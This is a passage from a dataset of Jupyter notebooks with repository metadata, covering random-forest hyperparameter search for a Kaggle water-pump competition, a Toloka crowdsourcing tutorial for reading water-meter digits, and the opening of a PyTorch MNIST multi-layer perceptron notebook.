identical. \n # extraction_type has higher level of detail.\n X = X.drop(columns=['extraction_type_class','extraction_type_group'])\n\n # installer & funder are almost identical. \n # funder has higher level of detail.\n X = X.drop(columns='installer') \n \n # management & management_group are almost identical. \n # management has higher level of detail.\n X = X.drop(columns='management_group') \n\n # region_code & region are almost identical. \n # region_code has higher level of detail.\n X = X.drop(columns='region') \n\n # return the wrangled dataframe\n return X\n\ntrain = wrangle(train)\ntest = wrangle(test)",
"_____no_output_____"
]
],
[
[
"## Use scikit-learn for hyperparameter optimization with RandomizedSearchCV.",
"_____no_output_____"
]
],
[
[
"pip install category_encoders",
"Requirement already satisfied: category_encoders in c:\\users\\jj\\anaconda3\\lib\\site-packages (2.1.0)\nRequirement already satisfied: statsmodels>=0.6.1 in c:\\users\\jj\\anaconda3\\lib\\site-packages (from category_encoders) (0.10.1)\nRequirement already satisfied: scipy>=0.19.0 in c:\\users\\jj\\anaconda3\\lib\\site-packages (from category_encoders) (1.3.1)\nRequirement already satisfied: numpy>=1.11.3 in c:\\users\\jj\\anaconda3\\lib\\site-packages (from category_encoders) (1.16.5)\nRequirement already satisfied: pandas>=0.21.1 in c:\\users\\jj\\anaconda3\\lib\\site-packages (from category_encoders) (0.25.1)\nRequirement already satisfied: scikit-learn>=0.20.0 in c:\\users\\jj\\anaconda3\\lib\\site-packages (from category_encoders) (0.21.3)\nRequirement already satisfied: patsy>=0.4.1 in c:\\users\\jj\\anaconda3\\lib\\site-packages (from category_encoders) (0.5.1)\nRequirement already satisfied: pytz>=2017.2 in c:\\users\\jj\\anaconda3\\lib\\site-packages (from pandas>=0.21.1->category_encoders) (2019.3)\nRequirement already satisfied: python-dateutil>=2.6.1 in c:\\users\\jj\\anaconda3\\lib\\site-packages (from pandas>=0.21.1->category_encoders) (2.8.0)\nRequirement already satisfied: joblib>=0.11 in c:\\users\\jj\\anaconda3\\lib\\site-packages (from scikit-learn>=0.20.0->category_encoders) (0.13.2)\nRequirement already satisfied: six in c:\\users\\jj\\anaconda3\\lib\\site-packages (from patsy>=0.4.1->category_encoders) (1.12.0)\nNote: you may need to restart the kernel to use updated packages.\n"
],
[
"import category_encoders as ce\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom scipy.stats import randint, uniform",
"_____no_output_____"
],
[
"%%time\n\ntarget = 'status_group'\n\nfeatures = train.columns.drop(target)\nX_train = train[features]\ny_train = train[target]\n\n\npipeline = make_pipeline(\n ce.OrdinalEncoder(), \n SimpleImputer(strategy='median'), \n RandomForestClassifier(n_estimators=100, max_depth=22, n_jobs=-1, random_state=42)\n)\n\nk = 5\nscores = cross_val_score(pipeline, X_train, y_train, cv=k, \n scoring='accuracy')\nprint(f'Accuracy for {k} folds:', scores)",
"Accuracy for 5 folds: [0.81163202 0.80843363 0.80833333 0.81026936 0.8103216 ]\nWall time: 1min 16s\n"
],
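[
"# (Added sketch, not from the original notebook.)\n# Summarizing the fold scores makes different runs easier to compare.\nprint(f'Mean accuracy: {scores.mean():.4f} +/- {scores.std():.4f}')",
"_____no_output_____"
],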
[
"%%time\n\ntarget = 'status_group'\n\nfeatures = train.columns.drop(target)\nX_train = train[features]\ny_train = train[target]\n\n# y_train_pre = train[target]\n# # Encode target feature, in order to use encoders like Target Encoder\n# encoder = ce.OrdinalEncoder()\n# y_train = encoder.fit_transform(y_train_pre)\n\npipeline = make_pipeline(\n ce.OrdinalEncoder(), \n SimpleImputer(strategy='median'), \n RandomForestClassifier(n_estimators=100, max_depth=22, n_jobs=-1, random_state=42)\n)\n\nparam_distributions = {\n# 'targetencoder__min_samples_leaf': randint(1, 15), \n# 'targetencoder__smoothing': uniform(1, 50), \n# 'simpleimputer__strategy': ['mean', 'median'], \n# 'randomforestclassifier__n_estimators': randint(80, 120), \n# 'randomforestclassifier__max_depth': range(16, 24), \n 'randomforestclassifier__max_features': uniform(0.2, 0.8),\n 'randomforestclassifier__criterion': ['gini', 'entropy'],\n}\n\n# If you're on Colab, decrease n_iter & cv parameters\nsearch = RandomizedSearchCV(\n pipeline, \n param_distributions=param_distributions, \n n_iter=10, \n cv=5, \n scoring='accuracy', \n verbose=10, \n return_train_score=True, \n n_jobs=-1\n)\n\nsearch.fit(X_train, y_train);",
"Fitting 5 folds for each of 10 candidates, totalling 50 fits\n"
],
[
"print('Best hyperparameters', search.best_params_)\nprint('Cross-validation Accuracy', search.best_score_)",
"Best hyperparameters {'randomforestclassifier__criterion': 'entropy', 'randomforestclassifier__max_features': 0.2627818360633932}\nCross-validation Accuracy 0.8103030303030303\n"
],
[
"pd.DataFrame(search.cv_results_).sort_values(by='rank_test_score').T",
"_____no_output_____"
]
],
[
[
"## Submit your predictions to DS10 Kaggle competition.",
"_____no_output_____"
]
],
[
[
"pipeline = search.best_estimator_",
"_____no_output_____"
],
[
"y_pred = pipeline.predict(test)\n\n# Makes a dataframe with two columns, id and status_group, \n# and writes to a csv file, without the index\n\n# sample_submission = pd.read_csv('sample_submission.csv')\nsubmission = sample_submission.copy()\nsubmission['status_group'] = y_pred\nsubmission.to_csv('your-submission-filename.csv', index=False)",
"_____no_output_____"
],
[
"# from google.colab import files\n# files.download('your-submission-filename.csv')",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb2c985b41ea6cb19a99f573005a3bec8a7830b0 | 30,806 | ipynb | Jupyter Notebook | examples/1.computer_vision/text_recognition/text_recognition.ipynb | lehasm/toloka-kit | 8f650e5d8cdded1949ca633cf78f9b851ce839bb | [
"Apache-2.0"
] | 153 | 2021-02-06T13:41:11.000Z | 2022-03-19T17:51:01.000Z | examples/1.computer_vision/text_recognition/text_recognition.ipynb | lehasm/toloka-kit | 8f650e5d8cdded1949ca633cf78f9b851ce839bb | [
"Apache-2.0"
] | 29 | 2021-01-15T12:54:37.000Z | 2022-02-07T07:45:32.000Z | examples/1.computer_vision/text_recognition/text_recognition.ipynb | lehasm/toloka-kit | 8f650e5d8cdded1949ca633cf78f9b851ce839bb | [
"Apache-2.0"
] | 17 | 2021-01-29T15:20:04.000Z | 2022-01-30T07:21:03.000Z | 33.018221 | 437 | 0.568104 | [
[
[
"# Text recognition\nWe have a set of water meter images. We need to get each water meter’s readings. We ask performers to look at the images and write down the digits on each water meter.",
"_____no_output_____"
],
[
"To get acquainted with Toloka tools for free, you can use the promo code **TOLOKAKIT1** on $20 on your [profile page](https://toloka.yandex.com/requester/profile?utm_source=github&utm_medium=site&utm_campaign=tolokakit) after registration.",
"_____no_output_____"
],
[
"Prepare environment and import all we'll need.",
"_____no_output_____"
]
],
[
[
"!pip install toloka-kit==0.1.15\n!pip install crowd-kit==0.0.7\n!pip install ipyplot\n\nimport datetime\nimport os\nimport sys\nimport time\nimport logging\n\nimport ipyplot\nimport pandas\nimport numpy as np\n\nimport toloka.client as toloka\nimport toloka.client.project.template_builder as tb\nfrom crowdkit.aggregation import ROVER\n\nlogging.basicConfig(\n format='[%(levelname)s] %(name)s: %(message)s',\n level=logging.INFO,\n stream=sys.stdout,\n)",
"_____no_output_____"
]
],
[
[
"Сreate toloka-client instance. All api calls will go through it. More about OAuth token in our [Learn the basics example](https://github.com/Toloka/toloka-kit/tree/main/examples/0.getting_started/0.learn_the_basics) [](https://colab.research.google.com/github/Toloka/toloka-kit/blob/main/examples/0.getting_started/0.learn_the_basics/learn_the_basics.ipynb)",
"_____no_output_____"
]
],
[
[
"toloka_client = toloka.TolokaClient(input(\"Enter your token:\"), 'PRODUCTION') # Or switch to 'SANDBOX'\nlogging.info(toloka_client.get_requester())",
"_____no_output_____"
]
],
[
[
"## Creating new project\nEnter a clear project name and description.\n> The project name and description will be visible to the performers.",
"_____no_output_____"
]
],
[
[
"project = toloka.Project(\n public_name='Write down the digits in an image',\n public_description='Look at the image and write down the digits shown on the water meter.',\n)",
"_____no_output_____"
]
],
[
[
"Create task interface.\n\n- Read about configuring the [task interface](https://toloka.ai/docs/guide/reference/interface-spec.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in the Requester’s Guide.\n- Check the [Interfaces section](https://toloka.ai/knowledgebase/interface?utm_source=github&utm_medium=site&utm_campaign=tolokakit) of our Knowledge Base for more tips on interface design.\n- Read more about the [Template builder](https://toloka.ai/docs/template-builder/index.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in the Requester’s Guide.",
"_____no_output_____"
]
],
[
[
"header_viewer = tb.MarkdownViewV1(\"\"\"1. Look at the image\n2. Find boxes with the numbers\n3. Write down the digits in black section. (Put '0' if there are no digits there)\n4. Put '.'\n5. Write down the digits in red section\"\"\")\n\nimage_viewer = tb.ImageViewV1(tb.InputData('image_url'), rotatable=True)\n\noutput_field = tb.TextFieldV1(\n tb.OutputData('value'),\n label='Write down the digits. Format: 365.235',\n placeholder='Enter value',\n hint=\"Make sure your format of number is '365.235' or '0.112'\",\n validation=tb.SchemaConditionV1(\n schema={\n 'type': 'string',\n 'pattern': r'^\\d+\\.?\\d{0,3}$',\n 'minLength': 1,\n 'maxLength': 9,\n }\n )\n)\n\ntask_width_plugin = tb.TolokaPluginV1('scroll', task_width=600)\n\nproject_interface = toloka.project.TemplateBuilderViewSpec(\n view=tb.ListViewV1([header_viewer, image_viewer, output_field]),\n plugins=[task_width_plugin],\n)",
"_____no_output_____"
]
],
[
[
"Set data specification. And set task interface to project.\n> Specifications are a description of input data that will be used in a project and the output data that will be collected from the performers.\n\nRead more about [input and output data specifications](https://yandex.ru/support/toloka-tb/operations/create-specs.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in the Requester’s Guide.",
"_____no_output_____"
]
],
[
[
"input_specification = {'image_url': toloka.project.UrlSpec()}\noutput_specification = {'value': toloka.project.StringSpec()}\n\nproject.task_spec = toloka.project.task_spec.TaskSpec(\n input_spec=input_specification,\n output_spec=output_specification,\n view_spec=project_interface,\n)",
"_____no_output_____"
]
],
[
[
"Write short and clear instructions.\n\n> Though the task itself is simple, be sure to add examples for non-obvious cases (like when there are no red digits on an image). This helps to eliminate noise in the labels.\n\nGet more tips on designing [instructions](https://toloka.ai/knowledgebase/instruction?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in our Knowledge Base.",
"_____no_output_____"
]
],
[
[
"project.public_instructions = \"\"\"This task is to solve machine learning problem of digit recognition on the image.<br>\nThe more precise you read the information from the image the more precise would be algorithm<br>\nYour contribution here is to get exact information even if there are any complicated and uncertain cases.<br>\nWe hope for your skills to solve one of the important science problem.<br><br>\n<b>Basic steps:</b><br>\n<ul><li>Look at the image and find meter with the numbers in the boxes</li>\n<li>Find black numbers/section and red numbers/section</li>\n<li>Put black and red numbers separated with '.' to text field</li></ul>\"\"\"",
"_____no_output_____"
]
],
[
[
"Create a project.",
"_____no_output_____"
]
],
[
[
"project = toloka_client.create_project(project)",
"_____no_output_____"
]
],
[
[
"## Preparing data\nThis example uses [Toloka WaterMeters](https://toloka.ai/datasets?utm_source=github&utm_medium=site&utm_campaign=tolokakit) dataset collected by Roman Kucev.",
"_____no_output_____"
]
],
[
[
"!curl https://s3.mds.yandex.net/tlk/dataset/TlkWaterMeters/data.tsv --output data.tsv\n\nraw_dataset = pandas.read_csv('data.tsv', sep='\\t', dtype={'value': 'str'})\nraw_dataset = raw_dataset[['image_url', 'value']]\n\nwith pandas.option_context(\"max_colwidth\", 100):\n display(raw_dataset)",
" % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n100 570k 100 570k 0 0 3299k 0 --:--:-- --:--:-- --:--:-- 3280k\n"
]
],
[
[
"Lets look at the images from this dataset:\n\n<table align=\"center\">\n <tr>\n <td>\n <img src=\"https://tlk.s3.yandex.net/dataset/TlkWaterMeters/images/id_53_value_595_825.jpg\" alt=\"value 595.825\">\n </td>\n <td>\n <img src=\"https://tlk.s3.yandex.net/dataset/TlkWaterMeters/images/id_553_value_65_475.jpg\" alt=\"value 65.475\">\n </td>\n <td>\n <img src=\"https://tlk.s3.yandex.net/dataset/TlkWaterMeters/images/id_407_value_21_86.jpg\" alt=\"value 21.860\">\n </td>\n </tr>\n <tr><td align=\"center\" colspan=\"3\">\n <b>Figure 1.</b> Images from dataset\n </td></tr>\n</table>",
"_____no_output_____"
],
[
"Split this dataset into three parts\n- Training tasks - we'll put them into training. This type of task must contain ground truth and hint about how to perform it.\n- Golden tasks - we'll put it into the regular pool. This type of task must contain ground truth.\n- Regular tasks - for regular pool. Only image url as input.",
"_____no_output_____"
]
],
[
[
"raw_dataset = raw_dataset.sample(frac=1).reset_index(drop=True)\n\ntraining_dataset, golden_dataset, main_dataset, _ = np.split(raw_dataset, [10, 20, 120], axis=0)\nprint(f'training_dataset - {len(training_dataset)}')\nprint(f'golden_dataset - {len(golden_dataset)}')\nprint(f'main_dataset - {len(main_dataset)}')",
"training_dataset - 10\ngolden_dataset - 10\nmain_dataset - 100\n"
]
],
[
[
"## Create a training pool\n> Training is an essential part of almost every crowdsourcing project. It allows you to select performers who have really mastered the task, and thus improve quality. Training is also a great tool for scaling your task because you can run it any time you need new performers.\n\nRead more about [selecting performers](https://toloka.ai/knowledgebase/quality-control?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in our Knowledge Base.",
"_____no_output_____"
]
],
[
[
"training = toloka.Training(\n project_id=project.id,\n private_name='Text recognition training',\n may_contain_adult_content=False,\n assignment_max_duration_seconds=60*10,\n mix_tasks_in_creation_order=False,\n shuffle_tasks_in_task_suite=False,\n training_tasks_in_task_suite_count=2,\n task_suites_required_to_pass=5,\n retry_training_after_days=5,\n inherited_instructions=True,\n)\ntraining = toloka_client.create_training(training)",
"_____no_output_____"
]
],
[
[
"Upload training tasks to the pool.\n> It’s important to include examples for all cases in the training. Make sure the training set is balanced and the comments explain why an answer is correct. Don’t just name the correct answers.",
"_____no_output_____"
]
],
[
[
"training_tasks = [\n toloka.Task(\n pool_id=training.id,\n input_values={'image_url': row.image_url},\n known_solutions = [toloka.task.BaseTask.KnownSolution(output_values={'value': row.value})],\n message_on_unknown_solution=f'Black section is {row.value.split(\".\")[0]}. Red section is {row.value.split(\".\")[1]}.',\n )\n for row in training_dataset.itertuples()\n]\nresult = toloka_client.create_tasks(training_tasks, allow_defaults=True)\nprint(len(result.items))",
"10\n"
]
],
[
[
"## Create the main pool\nA pool is a set of paid tasks grouped into task pages. These tasks are sent out for completion at the same time.\n\n> All tasks within a pool have the same settings (price, quality control, etc.)",
"_____no_output_____"
]
],
[
[
"pool = toloka.Pool(\n project_id=project.id,\n # Give the pool any convenient name. You are the only one who will see it.\n private_name='Write down the digits in an image.',\n may_contain_adult_content=False,\n # Set the price per task page.\n reward_per_assignment=0.02,\n will_expire=datetime.datetime.utcnow() + datetime.timedelta(days=365),\n # Overlap. This is the number of users who will complete the same task.\n defaults=toloka.Pool.Defaults(default_overlap_for_new_task_suites=3),\n # Time allowed for completing a task page\n assignment_max_duration_seconds=600,\n)",
"_____no_output_____"
]
],
[
[
"- Read more about [pricing principles](https://toloka.ai/knowledgebase/pricing?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in our Knowledge Base.\n- To understand [how overlap works](https://toloka.ai/docs/guide/concepts/mvote.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit), go to the Requester’s Guide.\n- To understand how much time it should take to complete a task suite, try doing it yourself.",
"_____no_output_____"
],
[
"Attach the training you created earlier and select the accuracy level that is required to reach the main pool.",
"_____no_output_____"
]
],
[
[
"pool.set_training_requirement(training_pool_id=training.id, training_passing_skill_value=75)",
"_____no_output_____"
]
],
[
[
"Select English-speaking performers",
"_____no_output_____"
]
],
[
[
"pool.filter = toloka.filter.Languages.in_('EN')",
"_____no_output_____"
]
],
[
[
"Set up [Quality control](https://toloka.ai/docs/guide/concepts/control.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit). Ban performers who give incorrect responses to control tasks.\n\n> Since tasks such as these have an answer that can be used as ground truth, we can use standard quality control rules like golden sets.\n\nRead more about [quality control principles](https://toloka.ai/knowledgebase/quality-control?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in our Knowledge Base or check out [control tasks settings](https://toloka.ai/docs/guide/concepts/goldenset.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in the Requester’s Guide.",
"_____no_output_____"
]
],
[
[
"pool.quality_control.add_action(\n collector=toloka.collectors.GoldenSet(),\n conditions=[\n toloka.conditions.GoldenSetCorrectAnswersRate < 80.0,\n toloka.conditions.GoldenSetAnswersCount >= 3\n ],\n action=toloka.actions.RestrictionV2(\n scope='PROJECT',\n duration=2,\n duration_unit='DAYS',\n private_comment='Control tasks failed'\n )\n)\n\npool.quality_control.add_action(\n collector=toloka.collectors.AssignmentSubmitTime(history_size=5, fast_submit_threshold_seconds=7),\n conditions=[toloka.conditions.FastSubmittedCount >= 1],\n action=toloka.actions.RestrictionV2(\n scope='PROJECT',\n duration=2,\n duration_unit='DAYS',\n private_comment='Fast response'\n ))",
"_____no_output_____"
]
],
[
[
"Specify\tthe number of tasks per page. For example: 3 main tasks and 1 control task.\n\n> We recommend putting as many tasks on one page as a performer can complete in 1 to 5 minutes. That way, performers are less likely to get tired, and they won’t lose a significant amount of data if a technical issue occurs.\n\nTo learn more about [grouping tasks](https://toloka.ai/docs/search/?utm_source=github&utm_medium=site&utm_campaign=tolokakit&query=smart+mixing) into suites, read the Requester’s Guide.",
"_____no_output_____"
]
],
[
[
"pool.set_mixer_config(\n real_tasks_count=3,\n golden_tasks_count=1\n)",
"_____no_output_____"
]
],
[
[
"Create pool",
"_____no_output_____"
]
],
[
[
"pool = toloka_client.create_pool(pool)",
"_____no_output_____"
]
],
[
[
"**Uploading tasks**\n\nCreate control tasks. In small pools, control tasks should account for 10–20% of all tasks.\n\n> Control tasks are tasks that already contain the correct response. They are used for checking the quality of responses from performers. The performer's response is compared to the response you provided. If they match, it means the performer answered correctly.\n> Make sure to include different variations of correct responses in equal amounts.\n\nTo learn more about [creating control tasks](https://toloka.ai/docs/guide/concepts/task_markup.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit), go to the Requester’s Guide.",
"_____no_output_____"
]
],
[
[
"golden_tasks = [\n toloka.Task(\n pool_id=pool.id,\n input_values={'image_url': row.image_url},\n known_solutions = [\n toloka.task.BaseTask.KnownSolution(\n output_values={'value': row.value}\n )\n ],\n infinite_overlap=True,\n )\n for row in golden_dataset.itertuples()\n]",
"_____no_output_____"
]
],
[
[
"Create pool tasks",
"_____no_output_____"
]
],
[
[
"tasks = [\n toloka.Task(\n pool_id=pool.id,\n input_values={'image_url': url},\n )\n for url in main_dataset['image_url']\n]",
"_____no_output_____"
]
],
[
[
"Upload tasks",
"_____no_output_____"
]
],
[
[
"created_tasks = toloka_client.create_tasks(golden_tasks + tasks, allow_defaults=True)\nprint(len(created_tasks.items))",
"110\n"
]
],
[
[
"You can visit the created pool in the web interface and preview the tasks and control tasks.\n\n<table align=\"center\">\n  <tr>\n    <td>\n      <img src=\"./img/performer_interface.png\" alt=\"Possible performer interface\">\n    </td>\n  </tr>\n  <tr><td align=\"center\">\n    <b>Figure 2.</b> Possible performer interface.\n  </td></tr>\n</table>",
"_____no_output_____"
],
[
"Start the pool.\n\n**Important.** Remember that real Toloka performers will complete the tasks. Double-check that everything is correct with your project configuration before you start the pool.",
"_____no_output_____"
]
],
[
[
"training = toloka_client.open_training(training.id)\nprint(f'training - {training.status}')\n\npool = toloka_client.open_pool(pool.id)\nprint(f'main pool - {pool.status}')",
"_____no_output_____"
]
],
[
[
"## Receiving responses",
"_____no_output_____"
],
[
"Wait until the pool is completed.",
"_____no_output_____"
]
],
[
[
"pool_id = pool.id\n\ndef wait_pool_for_close(pool_id, minutes_to_wait=1):\n sleep_time = 60 * minutes_to_wait\n pool = toloka_client.get_pool(pool_id)\n while not pool.is_closed():\n op = toloka_client.get_analytics([toloka.analytics_request.CompletionPercentagePoolAnalytics(subject_id=pool.id)])\n op = toloka_client.wait_operation(op)\n percentage = op.details['value'][0]['result']['value']\n logging.info(\n f' {datetime.datetime.now().strftime(\"%H:%M:%S\")}\\t'\n f'Pool {pool.id} - {percentage}%'\n )\n time.sleep(sleep_time)\n pool = toloka_client.get_pool(pool.id)\n logging.info('Pool was closed.')\n\nwait_pool_for_close(pool_id)",
"_____no_output_____"
]
],
[
[
"Get responses\n\nWhen all the tasks are completed, look at the responses from performers.",
"_____no_output_____"
]
],
[
[
"answers = []\n\nfor assignment in toloka_client.get_assignments(pool_id=pool.id, status='ACCEPTED'):\n for task, solution in zip(assignment.tasks, assignment.solutions):\n if not task.known_solutions:\n answers.append([task.input_values['image_url'], solution.output_values['value'], assignment.user_id])\n\nprint(f'answers count: {len(answers)}')\n# Prepare dataframe\nanswers_df = pandas.DataFrame(answers, columns=['task', 'text', 'performer'])",
"answers count: 300\n"
]
],
[
[
"Aggregate the results using the ROVER model implemented in [Crowd-Kit](https://github.com/Toloka/crowd-kit#crowd-kit-computational-quality-control-for-crowdsourcing).",
"_____no_output_____"
]
],
[
[
"rover_agg_df = ROVER(tokenizer=lambda x: list(x), detokenizer=lambda x: ''.join(x)).fit_predict(answers_df)",
"_____no_output_____"
]
],
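A quick aside on what the `fit_predict` call above does: ROVER aligns the performers' strings token by token (characters here) and votes on each position. The sketch below is an editorial illustration on invented toy answers, reusing the same column names (`task`, `text`, `performer`) and constructor arguments as the cell above; it assumes the `crowd-kit` package is installed and that `ROVER` comes from `crowdkit.aggregation`.

```python
# Toy illustration of character-level ROVER aggregation (invented data).
import pandas as pd
from crowdkit.aggregation import ROVER  # assumed import path for Crowd-Kit

toy_answers = pd.DataFrame([
    {'task': 'img_1', 'text': '595.825', 'performer': 'w1'},
    {'task': 'img_1', 'text': '595.825', 'performer': 'w2'},
    {'task': 'img_1', 'text': '595.826', 'performer': 'w3'},
])

toy_result = ROVER(
    tokenizer=lambda s: list(s),               # split each answer into characters
    detokenizer=lambda chars: ''.join(chars),  # glue the voted characters back together
).fit_predict(toy_answers)

print(toy_result)  # majority vote per aligned character; expected '595.825' for img_1
```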
[
[
"Look at the results.\n\nFirst, some preparation for displaying the results.",
"_____no_output_____"
]
],
[
[
"images = rover_agg_df.index.values\nlabels = rover_agg_df.values\nstart_with = 0",
"_____no_output_____"
]
],
[
[
"Note: The cell below can be run several times.",
"_____no_output_____"
]
],
[
[
"if start_with >= len(rover_agg_df):\n logging.info('no more images')\nelse:\n ipyplot.plot_images(\n images=images[start_with:],\n labels=labels[start_with:],\n max_images=8,\n img_width=300,\n )\n\n start_with += 8",
"_____no_output_____"
]
],
[
[
"**You** can see the labeled images. Some possible results are shown in figure 3 below.\n\n<table align=\"center\">\n <tr><td>\n <img src=\"./img/possible_result.png\"\n alt=\"Possible results\">\n </td></tr>\n <tr><td align=\"center\">\n <b>Figure 3.</b> Possible results.\n </td></tr>\n</table>",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb2ca965120380abaaf7244f8b387a43d6a865f5 | 167,560 | ipynb | Jupyter Notebook | convolutional-neural-networks/mnist-mlp/mnist_mlp_solution.ipynb | Oriolac/deep-learning-pytorch-exs | 1edc66d1bb4b1196ef47a048129240c9f350da91 | [
"MIT"
] | 1 | 2021-10-21T13:24:27.000Z | 2021-10-21T13:24:27.000Z | convolutional-neural-networks/mnist-mlp/mnist_mlp_solution.ipynb | Oriolac/deep-learning-pytorch-exs | 1edc66d1bb4b1196ef47a048129240c9f350da91 | [
"MIT"
] | null | null | null | convolutional-neural-networks/mnist-mlp/mnist_mlp_solution.ipynb | Oriolac/deep-learning-pytorch-exs | 1edc66d1bb4b1196ef47a048129240c9f350da91 | [
"MIT"
] | null | null | null | 301.90991 | 97,380 | 0.915767 | [
[
[
"# Multi-Layer Perceptron, MNIST\n---\nIn this notebook, we will train an MLP to classify images from the [MNIST database](http://yann.lecun.com/exdb/mnist/) of hand-written digits.\n\nThe process will be broken down into the following steps:\n>1. Load and visualize the data\n2. Define a neural network\n3. Train the model\n4. Evaluate the performance of our trained model on a test dataset!\n\nBefore we begin, we have to import the necessary libraries for working with data and PyTorch.",
"_____no_output_____"
]
],
[
[
"# import libraries\nimport torch\nimport numpy as np",
"_____no_output_____"
]
],
[
[
"---\n## Load and Visualize the [Data](http://pytorch.org/docs/stable/torchvision/datasets.html)\n\nDownloading may take a few moments, and you should see your progress as the data is loading. You may also choose to change the `batch_size` if you want to load more data at a time.\n\nThis cell will create DataLoaders for each of our datasets.",
"_____no_output_____"
]
],
[
[
"# The MNIST datasets are hosted on yann.lecun.com that has moved under CloudFlare protection\n# Run this script to enable the datasets download\n# Reference: https://github.com/pytorch/vision/issues/1938\n\nfrom six.moves import urllib\nopener = urllib.request.build_opener()\nopener.addheaders = [('User-agent', 'Mozilla/5.0')]\nurllib.request.install_opener(opener)",
"_____no_output_____"
],
[
"from torchvision import datasets\nimport torchvision.transforms as transforms\n\n# number of subprocesses to use for data loading\nnum_workers = 0\n# how many samples per batch to load\nbatch_size = 20\n\n# convert data to torch.FloatTensor\ntransform = transforms.ToTensor()\n\n# choose the training and test datasets\ntrain_data = datasets.MNIST(root='data', train=True,\n download=True, transform=transform)\ntest_data = datasets.MNIST(root='data', train=False,\n download=True, transform=transform)\n\n# prepare data loaders\ntrain_loader = torch.utils.data.DataLoader(train_data, batch_size=batch_size,\n num_workers=num_workers)\ntest_loader = torch.utils.data.DataLoader(test_data, batch_size=batch_size, \n num_workers=num_workers)",
"/home/oriol/exs/deep-learning-v2-pytorch/venv/lib/python3.8/site-packages/torchvision/datasets/mnist.py:498: UserWarning: The given NumPy array is not writeable, and PyTorch does not support non-writeable tensors. This means you can write to the underlying (supposedly non-writeable) NumPy array using the tensor. You may want to copy the array to protect its data or make it writeable before converting it to a tensor. This type of warning will be suppressed for the rest of this program. (Triggered internally at ../torch/csrc/utils/tensor_numpy.cpp:180.)\n return torch.from_numpy(parsed.astype(m[2], copy=False)).view(*s)\n"
]
],
[
[
"### Visualize a Batch of Training Data\n\nThe first step in a classification task is to take a look at the data, make sure it is loaded in correctly, then make any initial observations about patterns in that data.",
"_____no_output_____"
]
],
[
[
"import matplotlib.pyplot as plt\n%matplotlib inline\n \n# obtain one batch of training images\ndataiter = iter(train_loader)\nimages, labels = dataiter.next()\nimages = images.numpy()\n\n# plot the images in the batch, along with the corresponding labels\nfig = plt.figure(figsize=(25, 4))\nfor idx in np.arange(20):\n ax = fig.add_subplot(2, 20/2, idx+1, xticks=[], yticks=[])\n ax.imshow(np.squeeze(images[idx]), cmap='gray')\n # print out the correct label for each image\n # .item() gets the value contained in a Tensor\n ax.set_title(str(labels[idx].item()))",
"/tmp/ipykernel_2795/611598023.py:12: MatplotlibDeprecationWarning: Passing non-integers as three-element position specification is deprecated since 3.3 and will be removed two minor releases later.\n ax = fig.add_subplot(2, 20/2, idx+1, xticks=[], yticks=[])\n"
]
],
[
[
"### View an Image in More Detail",
"_____no_output_____"
]
],
[
[
"img = np.squeeze(images[1])\n\nfig = plt.figure(figsize = (12,12)) \nax = fig.add_subplot(111)\nax.imshow(img, cmap='gray')\nwidth, height = img.shape\nthresh = img.max()/2.5\nfor x in range(width):\n for y in range(height):\n val = round(img[x][y],2) if img[x][y] !=0 else 0\n ax.annotate(str(val), xy=(y,x),\n horizontalalignment='center',\n verticalalignment='center',\n color='white' if img[x][y]<thresh else 'black')",
"_____no_output_____"
]
],
[
[
"---\n## Define the Network [Architecture](http://pytorch.org/docs/stable/nn.html)\n\nThe architecture will be responsible for seeing as input a 784-dim Tensor of pixel values for each image, and producing a Tensor of length 10 (our number of classes) that indicates the class scores for an input image. This particular example uses two hidden layers and dropout to avoid overfitting.",
"_____no_output_____"
]
],
[
[
